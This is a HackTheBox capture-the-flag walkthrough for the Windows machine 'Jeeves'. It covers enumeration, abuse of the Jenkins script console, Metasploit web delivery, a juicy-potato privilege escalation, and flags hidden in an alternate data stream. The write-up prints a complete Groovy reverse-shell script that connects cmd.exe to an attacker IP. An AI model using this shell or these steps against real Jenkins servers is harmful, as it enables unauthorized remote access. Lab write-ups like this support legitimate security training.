Jeeves - HTB Series

# HTB Series - Jeeves ###### tags: `htb` `Jeeves` `windows` `walkthrough` We start by scanning the target with nmap to find open ports ![image](https://hackmd.io/_uploads/ByFia9Ys0.png) Navigating to the http ports, we can look at the directories under 50000 using dirb ![image](https://hackmd.io/_uploads/Bk5xR5Yi0.png) We navigate to /askjeeves ![image](https://hackmd.io/_uploads/HJf4CcFo0.png) We navigate to manage jenkins > script console ![image](https://hackmd.io/_uploads/S18v09YiA.png) We can use the script console to invoke a reverse shell ![image](https://hackmd.io/_uploads/rJOZyjYj0.png) We use this reverse shell ```=1 String host="10.10.14.3"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` We setup a listener on port 8044, run the script and receive a shell ![image](https://hackmd.io/_uploads/Sk1tJiYoA.png) We note privilege impersonation is enabled ![image](https://hackmd.io/_uploads/BkLCyjKsR.png) We can use msf to create a web delivery script and configure it with options as shown below ![image](https://hackmd.io/_uploads/Bk4K3mBhR.png) We then run the exploit and execute the resulting script on the shell we have ![image](https://hackmd.io/_uploads/BJPaxp83C.png) We run the exploit suggester to see possible ways to escalate ![image](https://hackmd.io/_uploads/S1vp-pI2C.png) ![image](https://hackmd.io/_uploads/SkQGOwD20.png) We are aiming on some potato attack practice on this one hence the following approach: We opt for exploit/windows/local/ms16_075_reflection_juicy and configure it as shown below ![image](https://hackmd.io/_uploads/SyUH2wvnR.png) Running the exploit gives us an elevated session ![image](https://hackmd.io/_uploads/r1U_nDvn0.png) We then get a privileged shell ![image](https://hackmd.io/_uploads/BJSVavPnA.png) I was aiming for token impersonation, but this particular exploit ended up not having a system token I could impersonate, though it did pop a shell as System so that wasn't required anymore. We navigate to the users directory for the user flag ![image](https://hackmd.io/_uploads/BkzmkuDhC.png) We navigate to the Admin's directory for the root flag ![image](https://hackmd.io/_uploads/SJIClOP3C.png) The file says we should look deeper, so we can use the /R to look deeper. ![image](https://hackmd.io/_uploads/H1d7-uv2A.png) It appears to be hidden in an alternate data stream, to uncover that we can use techniques from this [malware bytes post](https://www.malwarebytes.com/blog/101/2015/07/introduction-to-alternate-data-streams) Or we can use this workaround with more ![image](https://hackmd.io/_uploads/SJ-B-uPnR.png)